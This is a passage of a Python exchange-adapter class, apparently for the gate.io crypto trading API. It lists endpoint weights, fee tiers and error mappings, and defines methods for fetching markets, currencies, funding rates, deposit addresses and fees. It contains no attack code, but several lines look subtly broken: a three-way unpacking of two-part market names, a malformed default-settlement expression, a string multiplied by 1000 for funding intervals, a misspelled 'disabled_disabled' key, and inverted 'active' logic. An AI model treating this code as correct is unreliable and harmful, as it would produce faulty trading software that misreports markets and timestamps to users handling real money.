'loan_records/{load_record_id}': 1.5,
'auto_repay': 1.5,
'transferable': 1.5,
'cross/accounts': 1.5,
'cross/account_book': 1.5,
'cross/loans': 1.5,
'cross/loans/{loan_id}': 1.5,
'cross/loans/repayments': 1.5,
'cross/transferable': 1.5,
},
'post': {
'loans': 1.5,
'merged_loans': 1.5,
'loans/{loan_id}/repayment': 1.5,
'auto_repay': 1.5,
'cross/loans': 1.5,
'cross/loans/repayments': 1.5,
},
'patch': {
'loans/{loan_id}': 1.5,
'loan_records/{loan_record_id}': 1.5,
},
'delete': {
'loans/{loan_id}': 1.5,
},
},
'futures': {
'get': {
'{settle}/accounts': 1.5,
'{settle}/account_book': 1.5,
'{settle}/positions': 1.5,
'{settle}/positions/{contract}': 1.5,
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/my_trades': 1.5,
'{settle}/position_close': 1.5,
'{settle}/liquidates': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
},
'post': {
'{settle}/positions/{contract}/margin': 1.5,
'{settle}/positions/{contract}/leverage': 1.5,
'{settle}/positions/{contract}/risk_limit': 1.5,
'{settle}/dual_mode': 1.5,
'{settle}/dual_comp/positions/{contract}': 1.5,
'{settle}/dual_comp/positions/{contract}/margin': 1.5,
'{settle}/dual_comp/positions/{contract}/leverage': 1.5,
'{settle}/dual_comp/positions/{contract}/risk_limit': 1.5,
'{settle}/orders': 1.5,
'{settle}/price_orders': 1.5,
},
'delete': {
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
},
},
'delivery': {
'get': {
'{settle}/accounts': 1.5,
'{settle}/account_book': 1.5,
'{settle}/positions': 1.5,
'{settle}/positions/{contract}': 1.5,
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/my_trades': 1.5,
'{settle}/position_close': 1.5,
'{settle}/liquidates': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
},
'post': {
'{settle}/positions/{contract}/margin': 1.5,
'{settle}/positions/{contract}/leverage': 1.5,
'{settle}/positions/{contract}/risk_limit': 1.5,
'{settle}/orders': 1.5,
'{settle}/price_orders': 1.5,
},
'delete': {
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
},
},
},
},
'timeframes': {
'10s': '10s',
'1m': '1m',
'5m': '5m',
'15m': '15m',
'30m': '30m',
'1h': '1h',
'4h': '4h',
'8h': '8h',
'1d': '1d',
'7d': '7d',
},
# copied from gateiov2
'commonCurrencies': {
'88MPH': 'MPH',
'BIFI': 'Bitcoin File',
'BOX': 'DefiBox',
'BTCBEAR': 'BEAR',
'BTCBULL': 'BULL',
'BYN': 'Beyond Finance',
'EGG': 'Goose Finance',
'GTC': 'Game.com', # conflict with Gitcoin and Gastrocoin
'GTC_HT': 'Game.com HT',
'GTC_BSC': 'Game.com BSC',
'HIT': 'HitChain',
'MPH': 'Morpher', # conflict with 88MPH
'RAI': 'Rai Reflex Index', # conflict with RAI Finance
'SBTC': 'Super Bitcoin',
'STX': 'Stox',
'TNC': 'Trinity Network Credit',
'TON': 'TONToken',
'VAI': 'VAIOT',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
},
'options': {
'networks': {
'TRC20': 'TRX',
'ERC20': 'ETH',
'BEP20': 'BSC',
},
'accountsByType': {
'spot': 'spot',
'margin': 'margin',
'futures': 'futures',
'delivery': 'delivery',
},
'defaultType': 'spot',
'swap': {
'fetchMarkets': {
'settlementCurrencies': ['usdt', 'btc'],
},
},
'futures': {
'fetchMarkets': {
'settlementCurrencies': ['usdt', 'btc'],
},
},
},
'precisionMode': TICK_SIZE,
'fees': {
'trading': {
'tierBased': True,
'feeSide': 'get',
'percentage': True,
'maker': self.parse_number('0.002'),
'taker': self.parse_number('0.002'),
'tiers': {
# volume is in BTC
'maker': [
[self.parse_number('0'), self.parse_number('0.002')],
[self.parse_number('1.5'), self.parse_number('0.00185')],
[self.parse_number('3'), self.parse_number('0.00175')],
[self.parse_number('6'), self.parse_number('0.00165')],
[self.parse_number('12.5'), self.parse_number('0.00155')],
[self.parse_number('25'), self.parse_number('0.00145')],
[self.parse_number('75'), self.parse_number('0.00135')],
[self.parse_number('200'), self.parse_number('0.00125')],
[self.parse_number('500'), self.parse_number('0.00115')],
[self.parse_number('1250'), self.parse_number('0.00105')],
[self.parse_number('2500'), self.parse_number('0.00095')],
[self.parse_number('3000'), self.parse_number('0.00085')],
[self.parse_number('6000'), self.parse_number('0.00075')],
[self.parse_number('11000'), self.parse_number('0.00065')],
[self.parse_number('20000'), self.parse_number('0.00055')],
[self.parse_number('40000'), self.parse_number('0.00055')],
[self.parse_number('75000'), self.parse_number('0.00055')],
],
'taker': [
[self.parse_number('0'), self.parse_number('0.002')],
[self.parse_number('1.5'), self.parse_number('0.00195')],
[self.parse_number('3'), self.parse_number('0.00185')],
[self.parse_number('6'), self.parse_number('0.00175')],
[self.parse_number('12.5'), self.parse_number('0.00165')],
[self.parse_number('25'), self.parse_number('0.00155')],
[self.parse_number('75'), self.parse_number('0.00145')],
[self.parse_number('200'), self.parse_number('0.00135')],
[self.parse_number('500'), self.parse_number('0.00125')],
[self.parse_number('1250'), self.parse_number('0.00115')],
[self.parse_number('2500'), self.parse_number('0.00105')],
[self.parse_number('3000'), self.parse_number('0.00095')],
[self.parse_number('6000'), self.parse_number('0.00085')],
[self.parse_number('11000'), self.parse_number('0.00075')],
[self.parse_number('20000'), self.parse_number('0.00065')],
[self.parse_number('40000'), self.parse_number('0.00065')],
[self.parse_number('75000'), self.parse_number('0.00065')],
],
},
},
'swap': {
'tierBased': True,
'feeSide': 'base',
'percentage': True,
'maker': self.parse_number('0.0'),
'taker': self.parse_number('0.0005'),
'tiers': {
'maker': [
[self.parse_number('0'), self.parse_number('0.0000')],
[self.parse_number('1.5'), self.parse_number('-0.00005')],
[self.parse_number('3'), self.parse_number('-0.00005')],
[self.parse_number('6'), self.parse_number('-0.00005')],
[self.parse_number('12.5'), self.parse_number('-0.00005')],
[self.parse_number('25'), self.parse_number('-0.00005')],
[self.parse_number('75'), self.parse_number('-0.00005')],
[self.parse_number('200'), self.parse_number('-0.00005')],
[self.parse_number('500'), self.parse_number('-0.00005')],
[self.parse_number('1250'), self.parse_number('-0.00005')],
[self.parse_number('2500'), self.parse_number('-0.00005')],
[self.parse_number('3000'), self.parse_number('-0.00008')],
[self.parse_number('6000'), self.parse_number('-0.01000')],
[self.parse_number('11000'), self.parse_number('-0.01002')],
[self.parse_number('20000'), self.parse_number('-0.01005')],
[self.parse_number('40000'), self.parse_number('-0.02000')],
[self.parse_number('75000'), self.parse_number('-0.02005')],
],
'taker': [
[self.parse_number('0'), self.parse_number('0.00050')],
[self.parse_number('1.5'), self.parse_number('0.00048')],
[self.parse_number('3'), self.parse_number('0.00046')],
[self.parse_number('6'), self.parse_number('0.00044')],
[self.parse_number('12.5'), self.parse_number('0.00042')],
[self.parse_number('25'), self.parse_number('0.00040')],
[self.parse_number('75'), self.parse_number('0.00038')],
[self.parse_number('200'), self.parse_number('0.00036')],
[self.parse_number('500'), self.parse_number('0.00034')],
[self.parse_number('1250'), self.parse_number('0.00032')],
[self.parse_number('2500'), self.parse_number('0.00030')],
[self.parse_number('3000'), self.parse_number('0.00030')],
[self.parse_number('6000'), self.parse_number('0.00030')],
[self.parse_number('11000'), self.parse_number('0.00030')],
[self.parse_number('20000'), self.parse_number('0.00030')],
[self.parse_number('40000'), self.parse_number('0.00030')],
[self.parse_number('75000'), self.parse_number('0.00030')],
],
},
},
},
# https://www.gate.io/docs/apiv4/en/index.html#label-list
'exceptions': {
'INVALID_PARAM_VALUE': BadRequest,
'INVALID_PROTOCOL': BadRequest,
'INVALID_ARGUMENT': BadRequest,
'INVALID_REQUEST_BODY': BadRequest,
'MISSING_REQUIRED_PARAM': ArgumentsRequired,
'BAD_REQUEST': BadRequest,
'INVALID_CONTENT_TYPE': BadRequest,
'NOT_ACCEPTABLE': BadRequest,
'METHOD_NOT_ALLOWED': BadRequest,
'NOT_FOUND': ExchangeError,
'INVALID_CREDENTIALS': AuthenticationError,
'INVALID_KEY': AuthenticationError,
'IP_FORBIDDEN': AuthenticationError,
'READ_ONLY': PermissionDenied,
'INVALID_SIGNATURE': AuthenticationError,
'MISSING_REQUIRED_HEADER': AuthenticationError,
'REQUEST_EXPIRED': AuthenticationError,
'ACCOUNT_LOCKED': AccountSuspended,
'FORBIDDEN': PermissionDenied,
'SUB_ACCOUNT_NOT_FOUND': ExchangeError,
'SUB_ACCOUNT_LOCKED': AccountSuspended,
'MARGIN_BALANCE_EXCEPTION': ExchangeError,
'MARGIN_TRANSFER_FAILED': ExchangeError,
'TOO_MUCH_FUTURES_AVAILABLE': ExchangeError,
'FUTURES_BALANCE_NOT_ENOUGH': InsufficientFunds,
'ACCOUNT_EXCEPTION': ExchangeError,
'SUB_ACCOUNT_TRANSFER_FAILED': ExchangeError,
'ADDRESS_NOT_USED': ExchangeError,
'TOO_FAST': RateLimitExceeded,
'WITHDRAWAL_OVER_LIMIT': ExchangeError,
'API_WITHDRAW_DISABLED': ExchangeNotAvailable,
'INVALID_WITHDRAW_ID': ExchangeError,
'INVALID_WITHDRAW_CANCEL_STATUS': ExchangeError,
'INVALID_PRECISION': InvalidOrder,
'INVALID_CURRENCY': BadSymbol,
'INVALID_CURRENCY_PAIR': BadSymbol,
'POC_FILL_IMMEDIATELY': ExchangeError,
'ORDER_NOT_FOUND': OrderNotFound,
'ORDER_CLOSED': InvalidOrder,
'ORDER_CANCELLED': InvalidOrder,
'QUANTITY_NOT_ENOUGH': InvalidOrder,
'BALANCE_NOT_ENOUGH': InsufficientFunds,
'MARGIN_NOT_SUPPORTED': InvalidOrder,
'MARGIN_BALANCE_NOT_ENOUGH': InsufficientFunds,
'AMOUNT_TOO_LITTLE': InvalidOrder,
'AMOUNT_TOO_MUCH': InvalidOrder,
'REPEATED_CREATION': InvalidOrder,
'LOAN_NOT_FOUND': OrderNotFound,
'LOAN_RECORD_NOT_FOUND': OrderNotFound,
'NO_MATCHED_LOAN': ExchangeError,
'NOT_MERGEABLE': ExchangeError,
'NO_CHANGE': ExchangeError,
'REPAY_TOO_MUCH': ExchangeError,
'TOO_MANY_CURRENCY_PAIRS': InvalidOrder,
'TOO_MANY_ORDERS': InvalidOrder,
'MIXED_ACCOUNT_TYPE': InvalidOrder,
'AUTO_BORROW_TOO_MUCH': ExchangeError,
'TRADE_RESTRICTED': InsufficientFunds,
'USER_NOT_FOUND': ExchangeError,
'CONTRACT_NO_COUNTER': ExchangeError,
'CONTRACT_NOT_FOUND': BadSymbol,
'RISK_LIMIT_EXCEEDED': ExchangeError,
'INSUFFICIENT_AVAILABLE': InsufficientFunds,
'LIQUIDATE_IMMEDIATELY': InvalidOrder,
'LEVERAGE_TOO_HIGH': InvalidOrder,
'LEVERAGE_TOO_LOW': InvalidOrder,
'ORDER_NOT_OWNED': ExchangeError,
'ORDER_FINISHED': ExchangeError,
'POSITION_CROSS_MARGIN': ExchangeError,
'POSITION_IN_LIQUIDATION': ExchangeError,
'POSITION_IN_CLOSE': ExchangeError,
'POSITION_EMPTY': InvalidOrder,
'REMOVE_TOO_MUCH': ExchangeError,
'RISK_LIMIT_NOT_MULTIPLE': ExchangeError,
'RISK_LIMIT_TOO_HIGH': ExchangeError,
'RISK_LIMIT_TOO_lOW': ExchangeError,
'PRICE_TOO_DEVIATED': InvalidOrder,
'SIZE_TOO_LARGE': InvalidOrder,
'SIZE_TOO_SMALL': InvalidOrder,
'PRICE_OVER_LIQUIDATION': InvalidOrder,
'PRICE_OVER_BANKRUPT': InvalidOrder,
'ORDER_POC_IMMEDIATE': InvalidOrder,
'INCREASE_POSITION': InvalidOrder,
'CONTRACT_IN_DELISTING': ExchangeError,
'INTERNAL': ExchangeError,
'SERVER_ERROR': ExchangeError,
'TOO_BUSY': ExchangeNotAvailable,
},
})
def fetch_markets(self, params={}):
# :param params['type']: 'spot', 'margin', 'futures' or 'delivery'
# :param params['settle']: The quote currency
defaultType = self.safe_string_2(self.options, 'fetchMarkets', 'defaultType', 'spot')
type = self.safe_string(params, 'type', defaultType)
query = self.omit(params, 'type')
spot = (type == 'spot')
margin = (type == 'margin')
futures = (type == 'futures')
swap = (type == 'swap')
option = (type == 'option')
if not spot and not margin and not futures and not swap:
raise ExchangeError(self.id + " does not support '" + type + "' type, set exchange.options['defaultType'] to " + "'spot', 'margin', 'swap' or 'futures'") # eslint-disable-line quotes
response = None
result = []
method = self.get_supported_mapping(type, {
'spot': 'publicSpotGetCurrencyPairs',
'margin': 'publicMarginGetCurrencyPairs',
'swap': 'publicFuturesGetSettleContracts',
'futures': 'publicDeliveryGetSettleContracts',
})
if swap or futures or option:
settlementCurrencies = self.get_settlement_currencies(type, 'fetchMarkets')
for c in range(0, len(settlementCurrencies)):
settle = settlementCurrencies[c]
query['settle'] = settle
response = getattr(self, method)(query)
# Perpetual swap
# [
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
# ]
#
# Delivery Futures
# [
# {
# "name": "BTC_USDT_20200814",
# "underlying": "BTC_USDT",
# "cycle": "WEEKLY",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "mark_type": "index",
# "last_price": "9017",
# "mark_price": "9019",
# "index_price": "9005.3",
# "basis_rate": "0.185095",
# "basis_value": "13.7",
# "basis_impact_value": "100000",
# "settle_price": "0",
# "settle_price_interval": 60,
# "settle_price_duration": 1800,
# "settle_fee_rate": "0.0015",
# "expire_time": 1593763200,
# "order_price_round": "0.1",
# "mark_price_round": "0.1",
# "leverage_min": "1",
# "leverage_max": "100",
# "maintenance_rate": "1000000",
# "risk_limit_base": "140.726652109199",
# "risk_limit_step": "1000000",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "ref_discount_rate": "0",
# "ref_rebate_rate": "0.2",
# "order_price_deviate": "0.5",
# "order_size_min": 1,
# "order_size_max": 1000000,
# "orders_limit": 50,
# "orderbook_id": 63,
# "trade_id": 26,
# "trade_size": 435,
# "position_size": 130,
# "config_change_time": 1593158867,
# "in_delisting": False
# }
# ]
#
for i in range(0, len(response)):
market = response[i]
id = self.safe_string(market, 'name')
baseId, quoteId, date = id.split('_')
linear = quoteId.lower() == settle
inverse = baseId.lower() == settle
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = ''
if date:
symbol = base + '/' + quote + '-' + date + ':' + self.safe_currency_code(settle)
else:
symbol = base + '/' + quote + ':' + self.safe_currency_code(settle)
priceDeviate = self.safe_string(market, 'order_price_deviate')
markPrice = self.safe_string(market, 'mark_price')
minMultiplier = Precise.string_sub('1', priceDeviate)
maxMultiplier = Precise.string_add('1', priceDeviate)
minPrice = Precise.string_mul(minMultiplier, markPrice)
maxPrice = Precise.string_mul(maxMultiplier, markPrice)
takerPercent = self.safe_string(market, 'taker_fee_rate')
makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)
feeIndex = 'swap' if (type == 'futures') else type
pricePrecision = self.safe_number(market, 'order_price_round')
result.append({
'info': market,
'id': id,
'baseId': baseId,
'quoteId': quoteId,
'settleId': self.safe_symbol(settle),
'base': base,
'quote': quote,
'symbol': symbol,
'type': type,
'spot': spot,
'margin': margin,
'futures': futures,
'swap': swap,
'option': option,
'derivative': True,
'contract': True,
'linear': linear,
'inverse': inverse,
# Fee is in %, so divide by 100
'taker': self.parse_number(Precise.string_div(takerPercent, '100')),
'maker': self.parse_number(Precise.string_div(makerPercent, '100')),
'contractSize': self.safe_string(market, 'quanto_multiplier'),
'precision': {
'amount': self.parse_number('1'),
'price': pricePrecision,
},
'limits': {
'leverage': {
'min': self.safe_number(market, 'leverage_min'),
'max': self.safe_number(market, 'leverage_max'),
},
'amount': {
'min': self.safe_number(market, 'order_size_min'),
'max': self.safe_number(market, 'order_size_max'),
},
'price': {
'min': minPrice,
'max': maxPrice,
},
},
'expiry': self.safe_integer(market, 'expire_time'),
'fees': self.safe_value(self.fees, feeIndex, {}),
})
else:
response = getattr(self, method)(query)
#
# Spot
# [
# {
# "id": "DEGO_USDT",
# "base": "DEGO",
# "quote": "USDT",
# "fee": "0.2",
# "min_quote_amount": "1",
# "amount_precision": "4",
# "precision": "4",
# "trade_status": "tradable",
# "sell_start": "0",
# "buy_start": "0"
# }
# ]
#
# Margin
# [
# {
# "id": "ETH_USDT",
# "base": "ETH",
# "quote": "USDT",
# "leverage": 3,
# "min_base_amount": "0.01",
# "min_quote_amount": "100",
# "max_quote_amount": "1000000"
# }
# ]
#
for i in range(0, len(response)):
market = response[i]
id = self.safe_string(market, 'id')
spot = (type == 'spot')
futures = (type == 'futures')
swap = (type == 'swap')
option = (type == 'option')
baseId, quoteId = id.split('_')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
takerPercent = self.safe_string(market, 'fee')
makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)
amountPrecisionString = self.safe_string(market, 'amount_precision')
pricePrecisionString = self.safe_string(market, 'precision')
amountPrecision = self.parse_number(self.parse_precision(amountPrecisionString))
pricePrecision = self.parse_number(self.parse_precision(pricePrecisionString))
tradeStatus = self.safe_string(market, 'trade_status')
result.append({
'info': market,
'id': id,
'baseId': baseId,
'quoteId': quoteId,
'base': base,
'quote': quote,
'symbol': symbol,
'type': type,
'spot': spot,
'margin': margin,
'futures': futures,
'swap': swap,
'option': option,
'contract': False,
'derivative': False,
'linear': False,
'inverse': False,
# Fee is in %, so divide by 100
'taker': self.parse_number(Precise.string_div(takerPercent, '100')),
'maker': self.parse_number(Precise.string_div(makerPercent, '100')),
'precision': {
'amount': amountPrecision,
'price': pricePrecision,
},
'active': tradeStatus == 'tradable',
'limits': {
'amount': {
'min': amountPrecision,
'max': None,
},
'price': {
'min': pricePrecision,
'max': None,
},
'cost': {
'min': self.safe_number(market, 'min_quote_amount'),
'max': None,
},
'leverage': {
'max': self.safe_number(market, 'lever', 1),
},
},
})
return result
def prepare_request(self, market):
if market['contract']:
return {
'contract': market['id'],
'settle': market['settleId'],
}
else:
return {
'currency_pair': market['id'],
}
def get_settlement_currencies(self, type, method):
options = self.safe_value(self.options, type, {}) # ['BTC', 'USDT'] unified codes
fetchMarketsContractOptions = self.safe_value(options, method, {})
defaultSettle = type == ['usdt'] if 'swap' else ['btc']
return self.safe_value(fetchMarketsContractOptions, 'settlementCurrencies', defaultSettle)
def fetch_currencies(self, params={}):
response = self.publicSpotGetCurrencies(params)
#
# {
# "currency": "BCN",
# "delisted": False,
# "withdraw_disabled": True,
# "withdraw_delayed": False,
# "deposit_disabled": True,
# "trade_disabled": False
# }
#
result = {}
# TODO: remove magic constants
amountPrecision = self.parse_number('1e-6')
for i in range(0, len(response)):
entry = response[i]
currencyId = self.safe_string(entry, 'currency')
code = self.safe_currency_code(currencyId)
delisted = self.safe_value(entry, 'delisted')
withdraw_disabled = self.safe_value(entry, 'withdraw_disabled')
deposit_disabled = self.safe_value(entry, 'disabled_disabled')
trade_disabled = self.safe_value(entry, 'trade_disabled')
active = not (delisted and withdraw_disabled and deposit_disabled and trade_disabled)
result[code] = {
'id': currencyId,
'name': None,
'code': code,
'precision': amountPrecision,
'info': entry,
'active': active,
'fee': None,
'fees': [],
'limits': self.limits,
}
return result
def fetch_funding_rate(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'contract': market['id'],
'settle': market['quote'].lower(),
}
response = self.publicFuturesGetSettleContractsContract(self.extend(request, params))
#
# [
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
# ]
#
return self.parse_funding_rate(response)
def fetch_funding_rates(self, symbols=None, params={}):
self.load_markets()
settle = self.safe_string(params, 'settle') # TODO: Save settle in markets?
request = {
'settle': settle.lower(),
}
response = self.publicFuturesGetSettleContracts(self.extend(request, params))
#
# [
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
# ]
#
result = self.parse_funding_rates(response)
return self.filter_by_array(result, 'symbol', symbols)
def parse_funding_rate(self, contract, market=None):
#
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
#
marketId = self.safe_string(contract, 'name')
symbol = self.safe_symbol(marketId, market)
markPrice = self.safe_number(contract, 'mark_price')
indexPrice = self.safe_number(contract, 'index_price')
interestRate = self.safe_number(contract, 'interest_rate')
fundingRate = self.safe_string(contract, 'funding_rate')
fundingInterval = self.safe_string(contract, 'funding_interval') * 1000
nextFundingTime = self.safe_integer(contract, 'funding_next_apply') * 1000
previousFundingTime = (self.safe_number(contract, 'funding_next_apply') * 1000) - fundingInterval
fundingRateIndicative = self.safe_number(contract, 'funding_rate_indicative')
timestamp = self.milliseconds()
return {
'info': contract,
'symbol': symbol,
'markPrice': markPrice,
'indexPrice': indexPrice,
'interestRate': interestRate,
'estimatedSettlePrice': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'previousFundingRate': fundingRate,
'nextFundingRate': fundingRateIndicative,
'previousFundingTimestamp': previousFundingTime,
'nextFundingTimestamp': nextFundingTime,
'previousFundingDatetime': self.iso8601(previousFundingTime),
'nextFundingDatetime': self.iso8601(nextFundingTime),
}
def fetch_network_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = self.privateWalletGetDepositAddress(self.extend(request, params))
addresses = self.safe_value(response, 'multichain_addresses')
currencyId = self.safe_string(response, 'currency')
code = self.safe_currency_code(currencyId)
result = {}
for i in range(0, len(addresses)):
entry = addresses[i]
#
# {
# "chain": "ETH",
# "address": "0x359a697945E79C7e17b634675BD73B33324E9408",
# "payment_id": "",
# "payment_name": "",
# "obtain_failed": "0"
# }
#
obtainFailed = self.safe_integer(entry, 'obtain_failed')
if obtainFailed:
continue
network = self.safe_string(entry, 'chain')
address = self.safe_string(entry, 'address')
tag = self.safe_string(entry, 'payment_id')
tagLength = len(tag)
tag = tag if tagLength else None
result[network] = {
'info': entry,
'code': code,
'address': address,
'tag': tag,
}
return result
def fetch_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = self.privateWalletGetDepositAddress(self.extend(request, params))
#
# {
# "currency": "XRP",
# "address": "rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d 391331007",
# "multichain_addresses": [
# {
# "chain": "XRP",
# "address": "rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d",
# "payment_id": "391331007",
# "payment_name": "Tag",
# "obtain_failed": 0
# }
# ]
# }
#
currencyId = self.safe_string(response, 'currency')
code = self.safe_currency_code(currencyId)
addressField = self.safe_string(response, 'address')
tag = None
address = None
if addressField.find(' ') >= 0:
splitted = addressField.split(' ')
address = splitted[0]
tag = splitted[1]
else:
address = addressField
return {
'info': response,
'code': code,
'address': address,
'tag': tag,
'network': None,
}
def fetch_trading_fees(self, params={}):
self.load_markets()
response = self.privateWalletGetFee(params)
#
# {
# "user_id": 1486602,
# "taker_fee": "0.002",
# "maker_fee": "0.002",
# "gt_discount": True,
# "gt_taker_fee": "0.0015",
# "gt_maker_fee": "0.0015",
# "loan_fee": "0.18",
# "point_type": "0",
# "futures_taker_fee": "0.0005",
# "futures_maker_fee": "0"
# }
#
result = {}
taker = self.safe_number(response, 'taker_fee')
maker = self.safe_number(response, 'maker_fee')
for i in range(0, len(self.symbols)):
symbol = self.symbols[i]
result[symbol] = {
'maker': maker,
'taker': taker,
'info': response,
'symbol': symbol,
}
return result
def fetch_funding_fees(self, params={}):
self.load_markets()
response = self.privateWalletGetWithdrawStatus(params)
#
# {
# "currency": "MTN",
# "name": "Medicalchain",
# "name_cn": "Medicalchain",
# "deposit": "0",
# "withdraw_percent": "0%",
# "withdraw_fix": "900",
# "withdraw_day_limit": "500000",
# "withdraw_day_limit_remain": "500000",
# "withdraw_amount_mini": "900.1",
# "withdraw_eachtime_limit": "90000000000",
# "withdraw_fix_on_chains": {
# "ETH": "900"
# }
# }
#
withdrawFees = {}
for i in range(0, len(response)):
entry = response[i]
currencyId = self.safe_string(entry, 'currency')
code = self.safe_currency_code(currencyId)
withdrawFees[code] = {}
withdrawFix = self.safe_value(entry, 'withdraw_fix_on_chains')
if withdrawFix is None:
withdrawFix = {}
withdrawFix[code] = self.safe_number(entry, 'withdraw_fix')
keys = list(withdrawFix.keys())
for i in range(0, len(keys)):
key = keys[i]
withdrawFees[code][key] = self.parse_number(withdrawFix[key])
return {
'info': response,
'withdraw': withdrawFees,
'deposit': {},
}
def fetch_funding_history(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
# defaultType = 'future'
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchFundingHistory() requires the argument "symbol"')
market = self.market(symbol)
request = self.prepare_request(market)
request['type'] = 'fund' # 'dnw' 'pnl' 'fee' 'refr' 'fund' 'point_dnw' 'point_fee' 'point_refr'
if since is not None:
request['from'] = since
if limit is not None:
request['limit'] = limit
method = self.get_supported_mapping(market['type'], {
'swap': 'privateFuturesGetSettleAccountBook',
'futures': 'privateDeliveryGetSettleAccountBook',
})
response = getattr(self, method)(self.extend(request, params))
result = []
for i in range(0, len(response)):
entry = response[i]
timestamp = self.safe_timestamp(entry, 'time')
result.append({
'info': entry,
'symbol': symbol,
'code': self.safe_currency_code(self.safe_string(entry, 'text')),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'id': None,
'amount': self.safe_number(entry, 'change'),
})
return result
